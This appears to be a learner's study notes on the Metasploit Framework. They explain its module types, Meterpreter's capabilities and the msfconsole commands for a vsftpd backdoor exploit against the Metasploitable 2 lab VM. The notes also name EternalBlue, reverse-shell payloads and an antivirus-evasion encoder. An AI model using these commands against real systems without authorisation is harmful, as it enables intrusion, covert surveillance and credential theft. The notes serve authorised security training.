Date : 06 Mar, 2025
What is Metasploit Framework?
- The Metasploit Framework is an open-source penetration testing tool used to
find, exploit, and validatevulnerabilities in computer systems, networks, and web applications. - It’s like a Swiss army knife for ethical hackers and cybersecurity professionals.
Burp v/s Metasploitable
| Burp | Metasploitable | |
|---|---|---|
| focus area | Web-app, API, client-server interaction | OS , services, common known vulnerabilities(CVE), OS networks |
| users | web app testers/ pentesters | red team/pentesters |
| Good for | Finding xss, csrf, sql-injection, logical flaws in web apps | Gaining shell access, Privilege escalation |
What Can You Do With Metasploit?
| Use Case | Description |
|---|---|
| Vulnerability Scanning | Check if a system is vulnerable to known exploits |
| Exploit Execution | Launch real exploits on vulnerable machines (e.g., Metasploitable) |
| Payload Delivery | Inject code (like reverse shells, bind shells) into target systems |
| Post-Exploitation | Gather more info, elevate privileges, open backdoors |
| Defensive Testing | Help blue teams test and improve security defenses |
⚙️ Key Components:
- Exploits: Code that takes advantage of a vulnerability.
- Payloads: The actions you want to perform after exploitation (e.g., open a shell, create a user).
- Listeners (Handlers): Wait for a connection back from the payload.
- Modules: Building blocks like exploits, payloads, scanners, etc.
Example Use Flow:
- Launch Metasploit console:
msfconsole - Search for a vulnerability:
search vsftpd - Use an exploit:
use exploit/unix/ftp/vsftpd_234_backdoor - Set target options:
set RHOST <IP>,set RPORT <PORT> - Choose payload:
set PAYLOAD cmd/unix/interact - Exploit it:
exploit
What is Metasploitable 2?
Metasploitable 2 is a deliberately vulnerable virtual machine (VM) created by the developers of the Metasploit Framework. It's used primarily for penetration testing, ethical hacking, and cybersecurity training.
msfconsole
msfconsole is the main command-line interface (CLI) for the Metasploit Framework.
Metasploit has 6 types of modules:
1. Exploit Modules
- Contains the actual code that takes advantage of a vulnerability in a system or application.
Example: exploit/windows/smb/ms17_010_eternalblue
Module Type:
exploit→ This is an exploit module, meaning it tries to take advantage of a vulnerability.- Target Platform:
windows→ The target operating system is Windows.
Service or Protocol:
smb→ This exploit targets the SMB (Server Message Block) protocol, used for file and printer sharing on Windows networks.
Vulnerability ID and Name:
-
ms17_010_eternalblue:- MS17-010 is the Microsoft security bulletin ID.
- The vulnerability is popularly known as EternalBlue.
- This flaw was leaked by the Shadow Brokers and famously used in the WannaCry ransomware attack in 2017.
What does this exploit do?
- It exploits a critical vulnerability in the SMBv1 protocol on certain Windows systems.
- If successful, it can give the attacker remote code execution — meaning full control over the target system without needing login credentials.
2. Payload Modules
These are the actions you want to perform on the target once it is exploited.
Purpose:
To deliver malicious code or commands to the compromised system — this could be to open a shell, create a user, or install a backdoor.
Types of Payloads:
- Reverse Shell: Target connects back to the attacker.
- Bind Shell: Attacker connects to a port opened on the target.
- Meterpreter: Advanced payload that gives interactive control over the system.
windows/x64/meterpreter/reverse_tcp
This opens a reverse Meterpreter shell on a 64-bit Windows machine.
3. Auxiliary Modules
These are non-exploit modules used for tasks like scanning, sniffing, fuzzing, DoS, etc.
Purpose:
To gather information or perform supportive functions during a penetration test.
auxiliary/scanner/portscan/tcp
Performs a TCP port scan on the target to identify open services.
Use Cases:
- Service version scanning
- Login brute-forcing
- Network sniffing
- Vulnerability checking
4. Post Modules
These are used after a successful exploitation to interact further with the target — think of it as the “next stage”.
Purpose:
To perform post-exploitation tasks like extracting passwords, escalating privileges, or gathering system info.
post/windows/gather/enum_logged_on_users
Lists users currently logged into the system.
Use Cases:
- Dumping credentials
- Capturing keystrokes
- Installing persistence
- Mapping the internal network
5. Encoder Modules
Used to encode payloads so that they are less detectable by antivirus or intrusion detection systems (IDS).
Purpose:
To obfuscate the payload by encoding it, making it harder for security tools to identify the attack.
x86/shikata_ga_nai
A popular polymorphic encoder that creates a new version of the payload every time.
Encoders don’t encrypt the payload — they just transform it in a way to evade signature-based detection.
6. NOP Modules (No Operation)
NOP stands for "No Operation" — these are padding instructions used in exploits.
Purpose:
To align payloads in memory or bypass certain security mechanisms by "filling space" with harmless instructions.
nop/x86/opty2
Use Cases:
- Used in buffer overflow attacks
- Helps ensure the payload lands correctly in memory
- Rarely used directly by the attacker, but important in exploit development
Summary Table:
| Module Type | Purpose | Common Use |
|---|---|---|
| Exploit | Take advantage of a system flaw | Gain unauthorized access |
| Payload | Action after access is gained | Shells, backdoors, etc. |
| Auxiliary | Scanning, sniffing, DoS | Info gathering |
| Post | Tasks after exploitation | Privilege escalation, data theft |
| Encoder | Hide payloads from antivirus | Obfuscation |
| NOP | Help in memory alignment | Buffer overflow support |
Core Metasploit commands used during an exploitation setup. Let's break them down:
set RHOST
- RHOST stands for Remote Host.
- This is the IP address of the target machine (the victim).
- You're telling Metasploit, “This is the machine I want to attack.”
set RHOST 192.168.1.10
set LHOST
- LHOST stands for Local Host.
- This is the IP address of your attacker machine (usually your Kali Linux machine).
- It tells the target where to send the reverse connection back to once it’s compromised.
set LHOST 192.168.1.5
set PAYLOAD
-
A payload is the actual malicious code that will run on the target after the exploit succeeds.
-
You can choose different payloads depending on what you want:
- Reverse shell (target connects back to you)
- Bind shell (you connect to the target)
- Meterpreter session (a powerful post-exploitation shell)
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Quick Summary:
| Command | Meaning | You Set It To |
|---|---|---|
RHOST |
Remote target IP | Victim machine |
LHOST |
Local attacker IP | Your machine |
PAYLOAD |
What runs on the target after exploit | Shell, Meterpreter, etc. |
Meterpeter
- short for Meta-Interpreter
- a
post-exploitationtool that gives you an interactive shell on the target system after a successful exploit. - It’s not a traditional shell (like Bash or CMD) — it’s a powerful payload that
runs in memoryand gives you a stealthy, feature-rich command environment on the victim's machine.
How Meterpreter Works:
- Delivered as a payload after exploitation (e.g.,
windows/meterpreter/reverse_tcp) - Lives in memory only (no files written to disk — helps avoid AV detection)
- Communicates with your attacker machine over reverse TCP, HTTP, or HTTPS
Key Features of Meterpreter:
| Feature | Description |
|---|---|
| In-memory execution | Doesn’t touch disk, hard to detect |
| Command shell | Control the target system interactively |
| Screenshots | Take screenshots of the user’s desktop |
| Microphone recording | Capture audio from the victim’s mic |
| File upload/download | Move files between systems |
| Webcam snapshot | Take pictures using webcam |
| User session management | View or kill active user sessions |
| Privilege escalation | Try to get SYSTEM/root access |
| Keylogger | Record keystrokes in real-time |
| Network pivoting | Use the target as a proxy to reach internal networks |
Types of Meterpreter Payloads:
| Payload | Description |
|---|---|
windows/meterpreter/reverse_tcp |
Target connects back to attacker (most common) |
windows/meterpreter/bind_tcp |
Attacker connects to a port on the target |
windows/meterpreter/reverse_http |
Reverse shell over HTTP |
windows/meterpreter/reverse_https |
Reverse shell over encrypted HTTPS |